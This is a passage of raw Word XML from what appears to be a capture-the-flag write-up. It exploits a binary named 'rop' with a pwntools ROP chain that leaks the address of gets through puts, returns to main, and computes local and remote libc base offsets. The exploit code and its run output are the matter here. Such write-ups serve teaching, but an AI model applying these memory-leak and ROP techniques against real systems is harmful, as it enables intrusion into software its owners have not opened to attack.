        <w:t xml:space="preserve"> from the returned address, which is an ugly way of dealing with the problem. This is not needed when ran against a remote instance of rop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2875B3" w14:textId="77777777" w:rsidR="00605848" w:rsidRDefault="00605848">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00605848" w14:paraId="4B3F5B8F" w14:textId="77777777" w:rsidTr="00605848">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="0DFAE042" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>└─$ python3 RPP_Pwn_3.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C7A0DDA" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[+] Starting local process '/bin/bash': pid 193237</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21726825" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*] P°çáµ\x7f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D122856" w14:textId="3607B765" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] </w:t>
            </w:r>
            <w:r w:rsidRPr="00605848">
              <w:t>G</w:t>
            </w:r>
            <w:r>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00605848">
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="00605848">
              <w:t>s leak - 0xa7fb5e1e7b050</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA23D5C" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*] Switching to interactive mode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7718F59E" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1393B0B4" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23EE9813" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>0x00007ffc15109200 in ?? ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="134CCA9A" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>gef</w:t>
            </w:r>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>➤</w:t>
            </w:r>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  $ got</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0405242E" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5449AEF5" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>GOT protection: Partial RelRO | GOT functions: 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29C9DA53" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[0x601018] puts@GLIBC_2.2.5  →  0x7fb5e1e7bb00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC97C84" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[0x601020] __libc_start_main@GLIBC_2.2.5  →  0x7fb5e1e2d700</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FBAB00B" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[0x601028] __gmon_start__  →  0x4004e6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2800528A" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">[0x601030] </w:t>
            </w:r>
            <w:r w:rsidRPr="00605848">
              <w:t>gets@GLIBC_2.2.5  →  0x7fb5e1e7b050</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53DC7347" w14:textId="2F6B48FB" w:rsidR="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="00605848">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">[0x601038] setvbuf@GLIBC_2.2.5  →  0x7fb5e1e7c2e0 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58A864F3" w14:textId="69539E1B" w:rsidR="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Get Location Leaked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A0F61" w14:textId="4BC70B53" w:rsidR="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
      <w:r>
        <w:t>We can use the leaked value to calculate the base address of LibC, and therefore all of the gadgets and functions we need to pwn this thing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D8441" w14:textId="6211E956" w:rsidR="00605848" w:rsidRDefault="00605848" w:rsidP="00605848">
      <w:r>
        <w:t>In order to keep sending the program more data without restarting it, we can</w:t>
      </w:r>
      <w:r w:rsidR="00066F5F">
        <w:t xml:space="preserve"> append the address of the first line in main to the payload. This means that when puts returns, it will run the main method again instead of jumping to a random value in the stack and segfaulting like we have in the demo above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6E527" w14:textId="1BA0D13C" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00605848">
      <w:r>
        <w:t>This payload uses the same gadgets to leak the address of gets before the program jumps back to the first line in the main method.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00066F5F" w14:paraId="739968D6" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6334B270" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>def mainLinePld():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77AE6B78" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>binary = context.binary = ELF('./rop', checksec=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="795DD34D" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F8022CB" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x00000000004006b3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C375EE" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRDI = p64(0x004006b3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="128FD713" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>retGdgt = p64(0x004004a9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333A9C71" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A9058CA" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>pltPuts = p64(binary.plt.puts)</w:t>
            </w:r>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t># Address to call</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EAB30FF" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>gotGets = p64(binary.got.gets)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48838AE4" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="641B9A2A" w14:textId="701E7DBC" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>mainAddr = p64(0x00400621)</w:t>
            </w:r>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t># Address of first line in main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F638AB" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld = cyclic(40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DE8B1D1" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld += retGdgt + popRDI + gotGets + pltPuts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52FA7385" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>pld += mainAddr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66F5826C" w14:textId="6D2E91ED" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:tab/>
              <w:t>return pld</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F57C064" w14:textId="6FBEB596" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Payload to Jump to Main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD02713" w14:textId="1EC613B5" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
      <w:r>
        <w:t>This allows us to send rop another string of data as it essentially runs again, but because the process didn’t exit, the address values should stay the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEECAA4" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRDefault="00066F5F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE5ED1B" w14:textId="2D720154" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To calculate the offset of the LibC base address, subtract the distance between the gets function and the beginning of LibC from the returned gets address. When ran locally, rop uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00066F5F">
        <w:t>libc.so.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the remote instance uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00066F5F">
        <w:t>libc-2.31.so</w:t>
      </w:r>
      <w:r>
        <w:t>. The offset will be different for each.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00066F5F" w14:paraId="0A2A2D27" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="529FA880" w14:textId="6FD8F989" w:rsidR="00066F5F" w:rsidRPr="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Local Offset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> using </w:t>
            </w:r>
            <w:r w:rsidRPr="00066F5F">
              <w:t>libc.so.6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75545228" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00066F5F">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>libcBase = leak - 0x75050</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E6366D6" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Remote Offset using </w:t>
            </w:r>
            <w:r w:rsidRPr="00066F5F">
              <w:t>libc-2.31.so</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="348FC29F" w14:textId="50BF9D84" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00066F5F">
              <w:t>libcBase = leak - 0x00083970</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F12D4D6" w14:textId="04E71700" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Offsets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F9ABC" w14:textId="2E4F3F56" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00066F5F">
      <w:r>
        <w:t>Once we have the libC base address, we can use that to calculate the real location of our gadgets and strings in the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242797D2" w14:textId="4728271A" w:rsidR="00066F5F" w:rsidRDefault="00387AFC" w:rsidP="00066F5F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Pwn Locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534FC897" w14:textId="3CD87C13" w:rsidR="00066F5F" w:rsidRDefault="00387AFC" w:rsidP="00066F5F">
      <w:r>
        <w:t>The following gadgets are available in the binary itself:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
